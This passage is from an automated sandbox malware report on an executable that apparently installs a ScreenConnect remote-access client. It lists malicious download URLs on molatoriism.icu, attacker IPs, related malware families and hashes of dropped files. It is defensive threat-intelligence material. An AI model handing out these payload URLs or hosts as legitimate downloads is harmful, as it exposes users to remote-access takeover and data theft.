                                                                                                                                      https://molatoriism.icu/Bin/ScreenConnect.Client.applicationZ.L04re=ScreenConnect.WindowsClient.exe, 0000000A.00000002.1767483141.0000000001005000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                      unknown
                                                                                                                                      http://www.xrml.org/schema/2001/11/xrml2coredfsvc.exe, 00000001.00000002.2234906229.000001674DFCD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://account.live.com/inlinesignup.aspx?iww=1&id=80605svchost.exe, 00000008.00000003.1364059093.000002001D929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364184917.000002001D952000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://account.live.com/inlinesignup.aspx?iww=1&id=80604svchost.exe, 00000008.00000003.1364059093.000002001D929000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364184917.000002001D952000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srfsvchost.exe, 00000008.00000002.2594631421.000002001D048000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1364145022.000002001D910000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsoasvchost.exe, 00000008.00000002.2595233523.000002001D937000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://upx.sf.netAmcache.hve.6.drfalse
                                                                                                                                                  high
                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/scstsvchost.exe, 00000008.00000002.2595233523.000002001D937000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://iptc.org/std/Iptc4xmpCore/1.0/xmlns/Micdfsvc.exe, 00000001.00000002.2244136075.0000016766F5B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://molatoriism.icu/Bin/ScreenConnect.ClientService.exePdfsvc.exe, 00000001.00000002.2245764625.00000167687C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      • Avira URL Cloud: phishing
                                                                                                                                                      unknown
                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                      • 75% < No. of IPs
                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                      104.21.96.148
                                                                                                                                                      molatoriism.icuUnited States
                                                                                                                                                      13335CLOUDFLARENETUSfalse
                                                                                                                                                      62.182.85.100
                                                                                                                                                      pick09y.topUkraine
                                                                                                                                                      205172YANINA-ASUAfalse
                                                                                                                                                      IP
                                                                                                                                                      127.0.0.1
                                                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                      Analysis ID:1551436
                                                                                                                                                      Start date and time:2024-11-07 17:54:59 +01:00
                                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                                      Overall analysis duration:0h 7m 30s
                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                      Report type:full
                                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                      Number of analysed new started processes analysed:17
                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                      Technologies:
                                                                                                                                                      • HCA enabled
                                                                                                                                                      • EGA enabled
                                                                                                                                                      • AMSI enabled
                                                                                                                                                      Analysis Mode:default
                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                      Sample name:pzPO97QouM.exe
                                                                                                                                                      renamed because original name is a hash value
                                                                                                                                                      Original Sample Name:fe9cb4c7eaa00078639484c209a3acf1d5195cbec55bd7981e733fb179bea899.exe
                                                                                                                                                      Detection:MAL
                                                                                                                                                      Classification:mal57.evad.winEXE@18/75@2/3
                                                                                                                                                      EGA Information:
                                                                                                                                                      • Successful, ratio: 66.7%
                                                                                                                                                      HCA Information:
                                                                                                                                                      • Successful, ratio: 65%
                                                                                                                                                      • Number of executed functions: 183
                                                                                                                                                      • Number of non-executed functions: 26
                                                                                                                                                      Cookbook Comments:
                                                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 20.190.159.23, 40.126.31.67, 20.190.159.73, 20.190.159.2, 20.190.159.0, 20.190.159.4, 40.126.31.73, 40.126.31.69, 20.42.65.92, 184.28.90.27, 192.229.221.95, 2.19.126.163, 2.19.126.137, 93.184.221.240
                                                                                                                                                      • Excluded domains from analysis (whitelisted): azurefd-t-fb-prod.trafficmanager.net, slscr.update.microsoft.com, otelrules.afd.azureedge.net, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wu.azureedge.net, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, ocsp.edge.digicert.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, prdv4a.aadg.msidentity.com, fs.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, cacerts.digicert.com, www.tm.v4.a.prd.aadg.trafficmanager.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, onedsblobprdeus17.eastus.cloudapp.azure.com, blobcollector.events.data.trafficmanager.net, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, www.tm.lg.pr
                                                                                                                                                      • Execution Graph export aborted for target ScreenConnect.ClientService.exe, PID 2316 because it is empty
                                                                                                                                                      • Execution Graph export aborted for target ScreenConnect.ClientService.exe, PID 528 because it is empty
                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                      • VT rate limit hit for: pzPO97QouM.exe
                                                                                                                                                      TimeTypeDescription
                                                                                                                                                      11:55:49API Interceptor357238x Sleep call for process: dfsvc.exe modified
                                                                                                                                                      11:55:49API Interceptor1x Sleep call for process: pzPO97QouM.exe modified
                                                                                                                                                      11:55:51API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                                                                      11:55:57API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                      104.21.96.148http://molatoriism.icuGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                        molatoriism.icuhttp://molatoriism.icuGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                        • 104.21.96.148
                                                                                                                                                        s-part-0017.t-0009.fb-t-msedge.netMulti Graphics Inc CustomerVendor Form.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                        • 13.107.253.45
                                                                                                                                                        OaSEt8i2jE.exeGet hashmaliciousNjratBrowse
                                                                                                                                                        • 13.107.253.45
                                                                                                                                                        https://eu.docworkspace.com/d/sIGWvrvOeAYXvpLkGGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 13.107.253.45
                                                                                                                                                        PORgjGswYg.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 13.107.253.45
                                                                                                                                                        https://login-zendesk-account.servz.com.pkGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                        • 13.107.253.45
                                                                                                                                                        https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.it/url?q=https://www.google.ro/url?q=https://digitalplatform-admin-p.azurewebsites.net/external-link/?targetURL=https://www.google.nl/url?q=ZFCKQSES42J831UCOWMB4MEAK36T3IE7YuQiApLjODz3yh4nNeW8uuQi&rct=XS5d7c8770636a4f3fd2ed2ec05584079425wDnNeW8yycT&sa=t&esrc=nNeW8F5d7c8770636a4f3fd2ed2ec05584079425A0xys8Em2FL&source=&cd=tS6T85d7c8770636a4f3fd2ed2ec05584079425Tiw9XH&cad=XpPkDfJX5d7c8770636a4f3fd2ed2ec05584079425VS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fbyda.ng%2Fcig.bin%2Fgoin%2F%23c2VjcmV0YXJpYXRAcGVvLm9uLmNhGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                                                                                        • 13.107.253.45
                                                                                                                                                        COw7owNqAr.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                        • 13.107.253.45
                                                                                                                                                        SecuriteInfo.com.Variant.Symmi.42162.17217.532.dllGet hashmaliciousNumandoBrowse
                                                                                                                                                        • 13.107.253.45
                                                                                                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 13.107.253.45
                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                        • 13.107.253.45
                                                                                                                                                        fp2e7a.wpc.phicdn.nethttp://www.creativeformatsnetwork.com/690e2a7d88062e0c7bf23f5d01b4ab6b/invoke.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 192.229.221.95
                                                                                                                                                        https://issuu.com/onlinedocumentpdf/docs/documentation?fr=xKAE9_zU1NQGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 192.229.221.95
                                                                                                                                                        Attachment-551059325-009.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 192.229.221.95
                                                                                                                                                        https://truckstop.one/as/authorize?client_id=7a99fb37-0cbd-4526-a557-bd283b9e9cf4&redirect_uri=https%253a%252f%252fapp.truckstop.com%252flanding%252fpingexternallogincallback&response_type=code%2520id_token%2520token&state=openidconnect.authenticationproperties%253dd1azkrievou5xvfp-qj6lz4lvhnji_zurlus4dg4kpfyaz8_l_zh9eagafd4qs-4bp_xmv_gxhfi9cicmwuipdyvxvvyerzotaovt3vtqf9ajzj3wmqtyitt_jeovipdmigoy5j_5dpehnbhcu93ulmdxyuni7lptn61kjfj7vt78qwvlvinfcjk1ngsl46tbysxh2azfm_i1dlik1uodaqthlvy6gtmnpueowutlftvhwsb7ejrpju0ggwa6pbfqx5adq&response_mode=form_post&nonce=638448261415283047.mdq2yjfinjytmwrjyi00ote4lwi3yjitodyzytm5ymu3mdbmotkxmzeyzdmtmzm5nc00yzq2lthlnjktmdvindc5njg3owjk&x-client-sku=id_net461&x-client-ver=7.0.1.0Get hashmaliciousUnknownBrowse
                                                                                                                                                        • 192.229.221.95
                                                                                                                                                        http://ebook-hunter.orgGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 192.229.221.95
                                                                                                                                                        https://portafirmas.metromadrid.net/Get hashmaliciousUnknownBrowse
                                                                                                                                                        • 192.229.221.95
                                                                                                                                                        https://airtable.com/appghQwrDrrrgLn7v/shrt3wUeRvHDcMT9uGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 192.229.221.95
                                                                                                                                                        https://eu.docworkspace.com/d/sIGWvrvOeAYXvpLkGGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 192.229.221.95
                                                                                                                                                        https://login-zendesk-account.servz.com.pkGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                        • 192.229.221.95
                                                                                                                                                        https://google.com:login@login-zendesk-account.servz.com.pk/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                        • 192.229.221.95
                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                        CLOUDFLARENETUSvUWhc67uSc.exeGet hashmaliciousStormKittyBrowse
                                                                                                                                                        • 172.67.74.152
                                                                                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 172.67.133.135
                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                        • 104.21.5.155
                                                                                                                                                        Invoice-250288895-001-4031394-5629578.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 188.114.97.3
                                                                                                                                                        vUWhc67uSc.exeGet hashmaliciousStormKittyBrowse
                                                                                                                                                        • 172.67.74.152
                                                                                                                                                        https://issuu.com/onlinedocumentpdf/docs/documentation?fr=xKAE9_zU1NQGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 104.17.24.14
                                                                                                                                                        VjIFOc2E1i.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                        • 172.67.133.135
                                                                                                                                                        Attachment-551059325-009.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 188.114.96.3
                                                                                                                                                        Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                        • 104.21.16.142
                                                                                                                                                        2Qx5a1PR8h.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                        • 172.67.133.135
                                                                                                                                                        YANINA-ASUA2pFytt52ws.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 91.219.60.67
                                                                                                                                                        http://unsubscribe-me-now.netGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 62.182.81.132
                                                                                                                                                        11068-1106811068-11068.lnkGet hashmaliciousNetSupport RAT, NetSupport Downloader, MalLnkBrowse
                                                                                                                                                        • 31.42.177.233
                                                                                                                                                        BWV4hz5GdR.exeGet hashmaliciousGlupteba, LummaC Stealer, SmokeLoader, Stealc, XmrigBrowse
                                                                                                                                                        • 62.182.80.202
                                                                                                                                                        lxGAurRKvR.exeGet hashmaliciousGlupteba, LummaC Stealer, SmokeLoader, Stealc, XmrigBrowse
                                                                                                                                                        • 62.182.80.202
                                                                                                                                                        xZnG1FFx7L.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Mars Stealer, SmokeLoader, Socks5Systemz, StealcBrowse
                                                                                                                                                        • 62.182.80.202
                                                                                                                                                        KWwpSm0Cec.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Mars Stealer, SmokeLoader, Stealc, VidarBrowse
                                                                                                                                                        • 62.182.80.202
                                                                                                                                                        SKHOtnHl7J.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, SmokeLoader, Socks5Systemz, StealcBrowse
                                                                                                                                                        • 62.182.80.202
                                                                                                                                                        TiFfbUw37Q.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, SmokeLoader, Socks5Systemz, StealcBrowse
                                                                                                                                                        • 62.182.80.202
                                                                                                                                                        http://tk15bkym.r.ap-south-1.awstrack.me/L0/http:%2F%2Fbhd.servep2p.com%2Frr.php%2Foffer_6a04852005r8g7877c5h%3FsNrKtjnjQVgBITyLEQEEhmdDuAxIMIOewfOPocZfXfHGZgsDWWidjmHDMelzNaDjfsYuuYAsdhZdnrHjoPnxbVaOZmnM/1/0109018d3758d1ff-9c805ed2-5724-4e48-8618-a8116b861980-000000/m9ixxLC29T9orToAMAJAMeAZi-A=139Get hashmaliciousPhisherBrowse
                                                                                                                                                        • 91.219.63.241
                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                        3b5074b1b5d032e5620f69f9f700ff0evMRlWtVCEN.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                        • 104.21.96.148
                                                                                                                                                        batterygetbackwithgoodmovemententirelovegoodforrealitytogetmeack.htaGet hashmaliciousCobalt Strike, FormBook, HTMLPhisherBrowse
                                                                                                                                                        • 104.21.96.148
                                                                                                                                                        seethebestpartentirelifewithmygirlfriendonentirelifethings.htaGet hashmaliciousCobalt Strike, HTMLPhisher, Lokibot, Strela StealerBrowse
                                                                                                                                                        • 104.21.96.148
                                                                                                                                                        http://eon.keit.re.kr/WEOMTRACK.html?CPKN=O&CPSQ=88327186&CPSC=0&CPID=16122900000005&CPMEM=MTAwMDkwODg%3D&CLID=006&CLKN=CL&CPCED=20171231&DRTMF=5&DRTMT=60&URL=https://form.jotform.com/243104959551055Get hashmaliciousUnknownBrowse
                                                                                                                                                        • 104.21.96.148
                                                                                                                                                        Copia pendiente de pago Proveedor 107924.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                        • 104.21.96.148
                                                                                                                                                        PO#7372732993039398372372973928392832973PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                        • 104.21.96.148
                                                                                                                                                        ALI HASSO - P02515 & P02518.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                        • 104.21.96.148
                                                                                                                                                        QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        • 104.21.96.148
                                                                                                                                                        G72Zpzru1g.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                        • 104.21.96.148
                                                                                                                                                        Vakhdevi Resume 2024.jsGet hashmaliciousGookitLoaderBrowse
                                                                                                                                                        • 104.21.96.148
                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exestatments.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                          Scanned01Document_ms.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                            Scanned01Document_ms.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                              sstatment.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                extukGiBrn.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                  Vh0tTzx4Ko.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                    support.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                      support.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                        ScreenConnect.ClientSetup (1).exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                          ScreenConnect.ClientSetup (1).exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                            C:\Users\user\AppData\Local\Apps\2.0\B13JJA8P.Y3T\KXVNZ36Z.L04\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exestatments.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                              Scanned01Document_ms.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                Scanned01Document_ms.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                  sstatment.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                    extukGiBrn.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                      Vh0tTzx4Ko.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                        support.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                          support.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                            ScreenConnect.ClientSetup (1).exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                              ScreenConnect.ClientSetup (1).exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):1310720
                                                                                                                                                                                                Entropy (8bit):0.49321398540234523
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:1536:cJNnm0h6QV70hV40h5RJkS6SNJNJbSMeCXhtvKTeYYJyNtEBRDna33JnbgY1ZtaC:cJhXC9lHmutpJyiRDeJ/aUKrDgnmI
                                                                                                                                                                                                MD5:1D8AD7E19E2250864A7D68D2315B9B5D
                                                                                                                                                                                                SHA1:FC9CC0505BD1CF9D13E549CACED327536C0967EE
                                                                                                                                                                                                SHA-256:BFDD9DDD0F96502D0088788B7FB85B5ADC84299927DD184A4AFAE5F5E00309F5
                                                                                                                                                                                                SHA-512:36058E8ACF5F09622ED900BF487B38A8A9E2FB2061C447924E8D5147890C39CACB0B5F7DABF9D4009539AC8AD5C36A93AC2232C9E748968ABF0D1A4A9252DA3A
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:^.;V........@..@-....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@...................................&.#.\.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                File Type:Extensible storage engine DataBase, version 0x620, checksum 0xe975223b, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):1310720
                                                                                                                                                                                                Entropy (8bit):0.7217236883958209
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:1536:LSB2ESB2SSjlK/Tv5m0hnRJjAVtu8Ykr3g16tV2UPkLk+kcBLZiAcZwytuknSDVd:LazaNvFv8V2UW/DLzN/w4wZi
                                                                                                                                                                                                MD5:EDA2DA8A71197120EC4CA00C8E2D69E8
                                                                                                                                                                                                SHA1:2F27EB068EA71DEC1299BFA6D682483BB75AE1B8
                                                                                                                                                                                                SHA-256:5FD8CA3C351155FF96803E6A9CDF457AC40E8902027B52FDBB7D5649DDBD4120
                                                                                                                                                                                                SHA-512:7F57001CED3D6DD00CD9B936553882A2B2214A8BDC6D35F15EBE51D3118A5567EFE747AFF9D155258DBE2F3A3CA0BA35874F08F963B9E52623FE495E218C9C8C
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:.u";... ...............X\...;...{......................p.D..........{}.37...|..h.F.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......-....{...............................................................................................................................................................................................2...{..................................4.(.37...|..................lU.737...|...........................#......h.F.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):16384
                                                                                                                                                                                                Entropy (8bit):0.08139942499116633
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:3:1Om1KYeh1uZ/ew/fgsCrZClW/tkVzvll+SHY/Xl+/rQLve:MyKzh1utewfgs3GQxAS4M
                                                                                                                                                                                                MD5:9537666BA45A3F11A5EB888A61795B61
                                                                                                                                                                                                SHA1:261B39B2A1EDAD575E985A6BD4D568544CB0BFA6
                                                                                                                                                                                                SHA-256:5E03E77B3144AF7D3E5B7EDB800CA254F9731A3E7F75C22F008E517E5239CF48
                                                                                                                                                                                                SHA-512:604B671C59B40646C3E6BEF363A1A95CD668594A927FF4282BB9617FDA8CD1952C50867B0738F80847775256976371AC95A275C76594BE79602A8BB9E4A355F5
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:...}.....................................;...{..37...|.......{}..............{}......{}.vv_Q.....{}.................lU.737...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                                Entropy (8bit):0.9109370879161688
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:96:MdeFQYugGaswhqvGXyf8QXIDcQvc6QcEVcw3cE/jeq+HbHg/Jg+OgBCXEYcI+1ss:JXflsP0BU/Hezji0ozuiFDZ24IO8Sd
                                                                                                                                                                                                MD5:BF3C1F1EBBFE43DF9B59D644AA503571
                                                                                                                                                                                                SHA1:3910BC1BC05D887D9EBEC2E58747ED390A87DD94
                                                                                                                                                                                                SHA-256:240866836318EB19B2E4D8471E2F61D72C77E7458CF2066113DDC2062EBCB9AE
                                                                                                                                                                                                SHA-512:419F38A0D34FD5CF9994510616F5BFE17A7916E0B86AC1CA0EAD9354E529F79B1376F92B6420D23554C69CEBD26937AB93DEED5790192DA95C4F4360CBAA314A
                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.4.7.2.1.5.0.7.0.3.8.5.1.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.4.7.2.1.5.2.2.9.7.6.0.6.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.a.2.e.6.3.0.c.-.3.4.8.5.-.4.6.3.2.-.a.c.f.6.-.c.f.5.a.7.6.4.e.6.3.2.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.a.e.5.b.b.9.3.-.d.9.3.b.-.4.2.6.3.-.a.b.c.e.-.a.a.9.7.f.d.1.3.d.5.b.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.p.z.P.O.9.7.Q.o.u.M...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.1.0.-.0.0.0.1.-.0.0.1.4.-.a.4.e.7.-.a.2.e.5.3.5.3.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.3.0.a.7.6.e.a.1.9.d.9.e.8.2.e.9.1.5.2.6.9.9.e.2.7.7.e.e.6.a.4.f.0.0.0.0.f.f.f.f.!.0.0.0.0.b.2.a.6.e.7.5.a.d.e.1.8.f.1.0.e.2.d.0.c.d.7.0.9.6.3.0.f.5.e.5.5.1.d.b.c.e.f.a.e.!.p.z.P.O.9.7.Q.o.u.M...e.x.e.....T.a.r.g.e.t.A.p.p.
                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                File Type:Mini DuMP crash report, 14 streams, Thu Nov 7 16:55:52 2024, 0x1205a4 type
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):88200
                                                                                                                                                                                                Entropy (8bit):1.6331054417903996
                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                SSDEEP:192:8MoXg+4XkA0NeOhI/sFSj+w4Cr8lB3cDvUMld8XURSsH+tOZV627SQrZv/S5hj:joQ+thI/t+LlsvUgd8ES8KD2JpS5h
                                                                                                                                                                                                MD5:75D694C0FFB79CD4C5389BBC29C5CEAE
                                                                                                                                                                                                SHA1:848BA9D6467B028992CB62280C10BC9047D08CC3
                                                                                                                                                                                                SHA-256:751B43D49A974DE37B0A59C55FC05A94022D928E03BF65D24E96091F2C50955F
                                                                                                                                                                                                SHA-512:6CBF94693E5181E25CB10E5919797DB513F5CA1BE9296093C251634E471BC791578C0027EBFEA4D102F035869EFD2441D32075C3D06F1985A726020DFC093D4F
                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                Preview:MDMP..a..... .........,g....................................T....>..........T.......8...........T............!...7..........P...........<...............................................................................eJ..............GenuineIntel............T.............,g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                Size (bytes):8330
                                                                                                                                                                                                Entropy (8bit):3.6987443777247524
                                                                                                                                                                                                Encrypted:false
